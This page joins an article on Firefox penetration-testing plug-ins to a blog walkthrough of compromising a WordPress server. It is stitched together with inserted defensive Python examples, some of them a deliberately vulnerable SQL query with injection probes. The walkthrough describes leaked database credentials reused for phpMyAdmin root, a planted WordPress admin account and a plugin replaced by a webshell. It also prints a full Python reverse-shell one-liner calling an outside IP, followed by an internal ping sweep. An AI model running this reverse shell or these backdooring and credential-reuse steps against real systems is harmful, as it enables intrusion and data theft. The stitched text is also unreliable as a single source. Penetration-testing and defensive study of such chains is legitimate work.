Hackbar is another penetration testing tool. It appears as an extension of the address bar. Hackbar is capable of performing POST data manipulation, encryption, and encoding. This helps test XSS holes, web security, and SQL injections. Moreover, one can work on Hash algorithms, Base64 Decoding, and other data types with Hackbar.

Firesheep

Firesheep gives you the capability to hijack the HTTP sessions of other users on the same network. This plug-in shows all accounts found on the network. It uses the cookie unique to a logged-in account; this is a result of websites protecting the initial log-in but leaving the rest of the session unprotected.

These cookies are readily available to attackers on any open network. Firesheep captures users visiting an unsecured page. Double-clicking a captured item logs you in as that user.
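The weakness Firesheep exploits, and the kind of header detail Live HTTP Headers exposes, can be checked on the defending side by reading the `Set-Cookie` headers a site returns. The following Python audit is an added example, not code from the original article or from either plug-in: it parses a constructed raw HTTP response (not captured from any real site), and reports, per cookie, whether the `Secure`, `HttpOnly` and `SameSite` attributes are missing. A session cookie without `Secure` is exactly the cookie an open-network sniffer can capture; the heuristic for "looks like a session cookie" is an assumption of this example.

```python
"""Audit Set-Cookie headers for the attributes that defeat cookie sniffing
on open networks. Added example with a constructed sample response."""

# Constructed sample response; no real site was contacted.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html\r\n"
    "Set-Cookie: sessionid=abc123; Path=/\r\n"
    "Set-Cookie: csrftoken=xyz; Path=/; Secure; HttpOnly; SameSite=Lax\r\n"
    "Set-Cookie: pref=dark; Path=/; Secure\r\n"
    "\r\n"
    "<html><body>constructed body</body></html>"
)

# Substrings that suggest a cookie carries a login session (assumption).
SESSION_HINTS = ("sess", "sid", "auth", "token", "login")


def parse_set_cookies(raw_response):
    """Return the value part of every Set-Cookie header in a raw response."""
    head = raw_response.split("\r\n\r\n", 1)[0]
    cookies = []
    for line in head.split("\r\n")[1:]:  # skip the status line
        name, _, value = line.partition(":")
        if name.strip().lower() == "set-cookie":
            cookies.append(value.strip())
    return cookies


def audit_cookie(set_cookie_value):
    """Check one Set-Cookie value for the three protective attributes."""
    parts = [p.strip() for p in set_cookie_value.split(";")]
    name = parts[0].split("=", 1)[0]
    attrs = {}
    for p in parts[1:]:
        key, _, val = p.partition("=")
        attrs[key.lower()] = val if val else True
    problems = []
    if "secure" not in attrs:
        problems.append("missing Secure (sent over plain HTTP, capturable on an open network)")
    if "httponly" not in attrs:
        problems.append("missing HttpOnly (readable by page scripts)")
    if "samesite" not in attrs:
        problems.append("missing SameSite")
    session_like = any(h in name.lower() for h in SESSION_HINTS)
    return {"name": name, "session_like": session_like, "problems": problems}


def audit_response(raw_response):
    """Audit every cookie a response sets."""
    return [audit_cookie(c) for c in parse_set_cookies(raw_response)]


if __name__ == "__main__":
    for result in audit_response(SAMPLE_RESPONSE):
        flag = "SESSION" if result["session_like"] else "other"
        print(result["name"], flag, result["problems"] or "ok")
```

Run it against headers copied out of Live HTTP Headers or a proxy log; a session-like cookie with `missing Secure` is the finding to fix first, since `HttpOnly` and `SameSite` do not stop a sniffer on an unencrypted network.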

Tamper Data

Tamper Data is used to view and edit HTTP requests. This add-on records ongoing requests for display on a particular website. The window shows details such as time, total duration, size and other information. Notably, the data can be copied to an external file for future reference.


CryptoFox

CryptoFox is an encryption-decryption plug-in. It appears as an extension of the address bar. Moreover, it has two fields. The first one corresponds to the text that needs encryption. The next field is a selection of the desired encryption method.

CryptoFox supports over 40 techniques and includes a dictionary-attack reference for MD5 passwords. To test this plug-in, here is an AES 128-bit encryption; we will then use the AES 128-bit decrypt method to reverse it.


Type "helloworld!" in the text field. Next, select AES 128-bit encryption and press the decode button. When asked for a password, enter "passwd". Keep note of it, as the same password will be used for decryption later.


After entering your password, click OK. This encrypts the text, which is then displayed in the first field. To cross-check, select AES 128-bit Decrypt and use the same password.


Anonymox

Anonymox is a useful plug-in that enables anonymous browsing in Firefox. It creates a virtual identity that protects you and gives access to sites commonly blocked on your network. It also lets you change your IP address.

In addition, one can tweak Anonymox’s customizable settings per every website. Bypassing GeoIP blocks is also possible through this add-on. This is possible as it changes your origin location. This, as a result, gives you access to banned sites in your country.

Anonymox acts as an intermediary: the request is sent to the plug-in, and the plug-in itself talks to the web host. It enables you to select proxy identities.


SQL Inject Me

This penetration-testing plug-in identifies SQL injection vulnerabilities. It looks for database errors and loopholes by sending escape strings to the database through the application. A completed test result shows the errors found and the options.
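What the plug-in is probing for is easiest to see with the vulnerable query beside its fixed form. The following Python snippet is an added example, not code from the original article or from SQL Inject Me: it builds a constructed in-memory SQLite table, runs the same lookup once with string concatenation and once with a parameterized query, and shows why an escape string makes the first one error out or return every row while the second one returns nothing. Table and user names are constructed.

```python
"""Vulnerable string-built query beside the parameterized fix, with a probe
that mimics what an injection tester observes. Added example on constructed data."""
import sqlite3


def make_db():
    """Constructed sample table; not a real application database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, role TEXT)")
    conn.executemany("INSERT INTO users (username, role) VALUES (?, ?)",
                     [("alice", "admin"), ("bob", "user"), ("carol", "user")])
    return conn


def lookup_vulnerable(conn, username):
    """Deliberately vulnerable: user input is concatenated into the SQL text."""
    query = "SELECT username, role FROM users WHERE username = '" + username + "'"
    return conn.execute(query).fetchall()


def lookup_safe(conn, username):
    """Fixed form: the value travels as a bound parameter, never as SQL syntax."""
    return conn.execute("SELECT username, role FROM users WHERE username = ?",
                        (username,)).fetchall()


def probe(conn, payload):
    """What a tester sees for one escape string against the vulnerable lookup:
    a database error (syntax broken) or a changed result set (logic altered)."""
    try:
        rows = lookup_vulnerable(conn, payload)
        return {"error": None, "rows": len(rows)}
    except sqlite3.Error as exc:
        return {"error": type(exc).__name__, "rows": 0}


if __name__ == "__main__":
    db = make_db()
    print("normal:", lookup_vulnerable(db, "bob"))
    print("escape string against vulnerable lookup:", probe(db, "'"))
    print("tautology against vulnerable lookup:", lookup_vulnerable(db, "' OR '1'='1"))
    print("same input against safe lookup:", lookup_safe(db, "' OR '1'='1"))
```

The probe's two outcomes (an error from a lone quote, a larger result set from a tautology) are precisely the "database errors and loopholes" the plug-in reports; the parameterized version yields neither, which is the fix to recommend.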


Certificate Patrol

Certificate Patrol helps pinpoint man-in-the-middle attacks by checking SSL certificates. It shows whether anything within the certificate changed between visits. This add-on uses pop-ups to show you the SSL certificate details and lets you choose whether to save them. If saved, the plug-in can cross-check for disparities later.

To verify a certificate, the plug-in shows the old and new versions of the certificate. Compare them carefully for discrepancies, and click the Reject button should you find anything suspicious.
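The comparison Certificate Patrol performs is a trust-on-first-use check: remember the certificate seen for a host, and raise an alarm when a later visit presents a different one. The Python class below is an added example, not the plug-in's code: it keeps a per-host SHA-256 fingerprint store, classifies each presented certificate as first-seen, unchanged or changed, and leaves the accept/reject decision to the caller, as the plug-in does. The certificate bytes in the demo are constructed stand-ins, not real DER certificates; `fetch_der` shows how a live certificate would be obtained but is not used offline.

```python
"""Trust-on-first-use certificate fingerprint store, the check behind
"has this site's certificate changed?". Added example; sample bytes are constructed."""
import hashlib
import ssl


def fingerprint(der_bytes):
    """SHA-256 fingerprint of a DER certificate, colon-separated as browsers display it."""
    digest = hashlib.sha256(der_bytes).hexdigest().upper()
    return ":".join(digest[i:i + 2] for i in range(0, len(digest), 2))


def fetch_der(host, port=443):
    """Obtain a live server certificate as DER (network access; not used offline)."""
    pem = ssl.get_server_certificate((host, port))
    return ssl.PEM_cert_to_DER_cert(pem)


class CertPatrol:
    """Per-host fingerprint memory with explicit accept/reject, like the plug-in's pop-up."""

    def __init__(self):
        self.store = {}  # host -> fingerprint the user accepted

    def check(self, host, der_bytes):
        """Classify the presented certificate against what was saved for this host."""
        fp = fingerprint(der_bytes)
        saved = self.store.get(host)
        if saved is None:
            status = "first-seen"
        elif saved == fp:
            status = "unchanged"
        else:
            status = "changed"  # the case to inspect before trusting
        return {"status": status, "fingerprint": fp, "previous": saved}

    def accept(self, host, der_bytes):
        """User chose to save: remember this certificate for the host."""
        self.store[host] = fingerprint(der_bytes)

    def reject(self, host):
        """User chose Reject: forget the host so the next visit is re-examined."""
        self.store.pop(host, None)


# Constructed stand-ins for two different DER certificates (not real certificates).
CERT_ORIGINAL = b"-constructed-der-cert-for-example.test-serial-1-"
CERT_DIFFERENT = b"-constructed-der-cert-for-example.test-serial-2-"

if __name__ == "__main__":
    patrol = CertPatrol()
    print(patrol.check("example.test", CERT_ORIGINAL)["status"])   # first-seen
    patrol.accept("example.test", CERT_ORIGINAL)
    print(patrol.check("example.test", CERT_ORIGINAL)["status"])   # unchanged
    print(patrol.check("example.test", CERT_DIFFERENT)["status"])  # changed
```

A "changed" result is not proof of an attack (renewals change the fingerprint too), which is why the plug-in shows old and new side by side and leaves the judgement to you; what the store gives you is that the change is never silent.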


FoxySpider

Web crawlers are useful. FoxySpider in Firefox is one such add-on that organizes a website. It displays and arranges videos, music, images, etc. according to file types. It is useful in gathering information about a website.

An icon on the left side of the address bar indicates that FoxySpider is installed. There are three settings for this tool. Left clicking organizes the files, while right-clicking opens a search configuration window. Middle clicking on the icon, on the other hand, pops up a window to set requirements such as keywords or specified URLs.


Firefox has a 35% user rating. With plug-ins such as these, security engineers will find it convenient to perform their tasks. Testing and gathering information is made easier with these add-ons. We encourage you to download these plug-ins and try them out yourself.

Source: http://resources.infosecinstitute.com/firefox-plug-ins-that-a-security-engineer-need-to-know/


PIVOTING TO THE INTERNAL NETWORK

Several months back, I ran a penetration test on WordPress. It was a generic web application security assessment. However, in this instance, I managed to compromise the server and, most importantly, to pivot through the internal network. I figured I'd take the compromise walk-through and turn it into a blog post for you guys today. And so, let's do this.

Although I ran several vulnerability scanners including Nessus, OpenVAS and HP Web Inspect against the target website during the penetration test, it was Acunetix that gave me the vulnerability that would become the proverbial first domino. What a cute little gem.

COMPROMISING WORDPRESS

The scanner found a wp_config file which is usually not viewable externally. Probably, there was an issue while the developer or system administrator was working on the server. Maybe he or she got disconnected from the server while editing the file, and that caused the text editor (vi, for example) to create a backup file called wp_config~. Wow, can you believe the scanner even found this?

Step 1: Running the Acunetix vulnerability scanner


Additionally, the Acunetix web vulnerability scanner identified the backup of a configuration file that contained database passwords located at http://www.targetcompany.com/blog/wp-config.php~

// ** MySQL settings - You can get this info from your web host ** //

/** The name of the database for WordPress */
define('DB_NAME', 'targetcompany_blog');

/** MySQL database username */
define('DB_USER', 'targetcompanywp');

/** MySQL database password */
define('DB_PASSWORD', 'weakpassword123');

Step 2: Database port is not remotely accessible so look for phpMyAdmin

Although I had database credentials, I had noticed in my scan data from the other vulnerability scanners that the target server was behind a Cisco ASA Firewall and the database port 3306 was not externally accessible. As a result, I couldn't connect to the database directly because the firewall did not allow access to the MySQL database port 3306.

It’s very common for webmasters to use a web-based tool such as phpMyAdmin to administer the database. Luckily for me, the target-company is running phpMyAdmin. Since I have database passwords, I guessed that the password for the target-company wp account which was weakpassword123 could also be the same password for the database administrative level account named root, and I was correct – it worked!

Access to the phpMyAdmin page is here:

http://targetcompany.com/phpmyadmin/


Step 3: Credentials worked

The password weakpassword123 worked for the root account, and thus, I successfully logged in to phpMyAdmin.


Step 4: View all of the databases on the server

Here I see the names of the other databases on the server.

· targetcompany

· targetcompany_blog

· white_papers


Step 5: View the users and their respective privilege levels

Next, I moved on to the privileges tab to see what level of privileges each user has. I hit the jackpot by being the root user. Most of all, I have 'ALL PRIVILEGES'.


Step 6: I can export all of the databases

If the goal of the attacker is to steal as much as possible, then the export option would, therefore, be the best way to go.

NOTE: This export option did NOT get executed in this engagement. Remember guys – we are pentesters – NOT hackers. As a result, the last thing you want to do as a pentester is actually to possess a customer’s business critical data. Proving you can access data is one thing, but staying on the safe side and just proving that you can get there – that’s usually all a customer needs to see to be happy with your work.


Step 7: Usernames and passwords

Afterward, I switched to the users table in the target-company database. Here, I see that the passwords for ALL of the customers are stored in clear text. Under those circumstances, I had to let the client know that this is not a good idea.

[Screenshots: further pages of usernames and passwords]

Step 8: Looking at the MySQL database

I switched to the user table in the MySQL database. I see here that WordPress has hashed passwords. The database has hashed passwords too.


Step 9: Attacking WordPress

I switched to the wp_users table in the target-company_blog database. I see here that WordPress has properly hashed and salted passwords.
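The contrast between Step 7 (customer passwords in clear text) and this step (WordPress passwords hashed and salted) is the point to take to the client. The following Python code is an added example, not code from the original post or from WordPress: it stores a password as a salted, iterated PBKDF2-HMAC-SHA256 digest in a self-describing string, verifies with a constant-time comparison, and includes a small heuristic a reviewer can run over a users table to spot values that are not hashed at all. The iteration count is an assumption to tune per deployment; `weakpassword123` is the sample value from the post.

```python
"""Salted, iterated password hashing beside a reviewer's plain-text check.
Added example, standard-library only."""
import hashlib
import hmac
import os

ITERATIONS = 600_000  # assumption: a current PBKDF2-HMAC-SHA256 work factor; tune per hardware
ALGO_TAG = "pbkdf2_sha256"


def hash_password(password, iterations=ITERATIONS, salt=None):
    """Return 'pbkdf2_sha256$<iterations>$<salt hex>$<digest hex>'.
    A fresh random salt per password means equal passwords never hash equal."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return "%s$%d$%s$%s" % (ALGO_TAG, iterations, salt.hex(), digest.hex())


def verify_password(password, stored):
    """Recompute with the stored salt and iteration count; compare in constant time."""
    try:
        algo, iterations, salt_hex, digest_hex = stored.split("$")
    except ValueError:
        return False
    if algo != ALGO_TAG:
        return False
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                 bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(digest.hex(), digest_hex)


def is_plaintext_like(stored):
    """Reviewer heuristic for a users table: a properly hashed value carries an
    algorithm tag and salt; anything else deserves the finding from Step 7."""
    return not stored.startswith(ALGO_TAG + "$")


if __name__ == "__main__":
    record = hash_password("weakpassword123")
    print(record)
    print("correct password verifies:", verify_password("weakpassword123", record))
    print("wrong password verifies:", verify_password("guess", record))
    print("clear-text column flagged:", is_plaintext_like("weakpassword123"))
```

The self-describing format is what lets the iteration count be raised later without invalidating existing records: each stored value carries the parameters needed to verify it.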


Step 10: Create a privileged account in WordPress

Here I am creating a privileged account named joe_strategicsec in WordPress. Creating the account is a multi-step process which you will see in the following screenshots.


After filling out the menu items required to create the account, you'll see the SQL statement execution.


Then, after filling out the meta_key field menu item 'wp_capabilities' required to set the privilege level of the account you just created, you'll see the SQL statement execution.


After filling out the next meta_key field menu item 'wp_user_level' required to set the privilege level of the account you just created, you'll see the SQL statement execution.


Step 11: Leveraging WordPress access

I can now see the joe_strategicsec account that gets created in the WordPress database. Ok, well it is covered in red but just trust me it’s there.


Step 12: Login to the newly created WordPress account


I have logged in as user joe_strategicsec, so I can now see WordPress Dashboard.

Step 13: WordPress Users

Here I view the WordPress users.


Step 14: Backdooring a WordPress plugin

I quickly switch to the plugins section and back door the Akismet plugin by replacing the source code of one of the pages with a PHP webshell. The code for a webshell is pretty easy; it's just a few lines of PHP.
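Two of the findings in this walk-through are things a server owner can catch routinely: the editor backup file from Step 1 (`wp-config.php~`) and the modified plugin file from this step. The Python checker below is an added example, not code from the original post or from WordPress: it walks a web root for editor backup and swap files, records a SHA-256 baseline of every file, and reports files that were later modified, added or removed. The sample web root is constructed in a temporary directory with placeholder contents; the path `blog/wp-content/plugins/akismet/akismet.php` is the one named in the post.

```python
"""Web-root hygiene check: leftover editor backup files plus a file-integrity
baseline that catches a tampered plugin. Added example on a constructed tree."""
import hashlib
import os
import tempfile

# Common leftovers from editors and deploy scripts that expose source or secrets.
BACKUP_SUFFIXES = ("~", ".bak", ".orig", ".old", ".save", ".swp")

# Relative paths used by the constructed sample (os.sep-correct on any platform).
SAMPLE_BACKUP = os.path.join("blog", "wp-config.php~")
SAMPLE_PLUGIN = os.path.join("blog", "wp-content", "plugins", "akismet", "akismet.php")


def find_backup_files(root):
    """Relative paths of files whose name ends in a backup/swap suffix."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith(BACKUP_SUFFIXES):
                hits.append(os.path.relpath(os.path.join(dirpath, name), root))
    return sorted(hits)


def build_baseline(root):
    """Map relative path -> SHA-256 of content for every file under root."""
    baseline = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                baseline[os.path.relpath(full, root)] = hashlib.sha256(fh.read()).hexdigest()
    return baseline


def compare_to_baseline(root, baseline):
    """Diff the current tree against a saved baseline."""
    current = build_baseline(root)
    return {
        "modified": sorted(p for p in current if p in baseline and current[p] != baseline[p]),
        "added": sorted(p for p in current if p not in baseline),
        "removed": sorted(p for p in baseline if p not in current),
    }


def write_file(root, relpath, text, mode="w"):
    """Create or append to a file under root (used to build and tamper the sample)."""
    full = os.path.join(root, relpath)
    os.makedirs(os.path.dirname(full), exist_ok=True)
    with open(full, mode) as fh:
        fh.write(text)


def build_sample_webroot():
    """Constructed sample tree with a config, its editor backup and one plugin file."""
    root = tempfile.mkdtemp(prefix="webroot_")
    config = "<?php define('DB_PASSWORD', 'example-placeholder');\n"
    write_file(root, os.path.join("blog", "wp-config.php"), config)
    write_file(root, SAMPLE_BACKUP, config)  # the kind of file Step 1 found
    write_file(root, SAMPLE_PLUGIN, "<?php /* constructed plugin placeholder */\n")
    return root


if __name__ == "__main__":
    root = build_sample_webroot()
    print("backup files exposed:", find_backup_files(root))
    baseline = build_baseline(root)
    write_file(root, SAMPLE_PLUGIN, "<?php /* constructed tampered content */\n", mode="a")
    print("integrity diff:", compare_to_baseline(root, baseline))
```

In practice the baseline is taken right after a clean deploy and stored off the server, so that a changed plugin file shows up as "modified" even when the attacker can write to the web root.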


Step 15: Accessing the webshell

One can find the WordPress plugin that got converted to a webshell at:

https://www.targetcompany.com/blog/wp-content/plugins/akismet/akismet.php

To get the Linux server’s internal IP address, you can execute the command:

/sbin/ifconfig


To get the Linux server’s version you can execute the command:

cat /etc/issue


To get the Linux server’s kernel version you can execute the command:

uname -a


Step 16: Use Python to create a reverse shell

Executing system commands via a webshell is often required when attacking web servers, but a real command shell is the preferred access method. Since the target web server is behind a Cisco firewall, I cannot connect to the server directly. I must make the server connect to me since outbound firewall rules are often less restrictive than inbound firewall rules.

Inside of the webshell I can use Python to create a reverse-connecting network socket that encapsulates the Linux command shell. I do this by typing the following syntax into the webshell (yes, I know that there is no screenshot, but in the webshell just type the following line of Python):

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("54.186.248.116",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Now, you’ll see in the screenshot below that I have a netcat listener that receives a connection from the compromised server.


Here you’ll see that I do a /sbin/ifconfig and the host has a 192.168 address, so I know that this box is on an internal network.


PIVOTING TO THE INTERNAL NETWORK

Step 17: Attack the internal network

Next, I prove that I can attack the internal network with a command-line ping sweep. Since there was no Nmap installed, I wrote a quick for loop to ping the entire subnet.


Step 18: No Nmap installed so went for a command-line ping sweep


At this point, I opted to end this portion of the engagement and notify the client that no further exploitation was required. It would only be a matter of time to achieve root access on this server via local privilege escalation, then install more hacking tools and pivot further into the internal network.

I hope that you like this blog post, and I do apologize for the pictures being fuzzy, but I had to take them out of a pentest document and sanitize them. I decided to write this blog post because I thought it would be a good example of the kinds of things that I'll be covering in the new Pentester Lab Network, which I hope you will check out.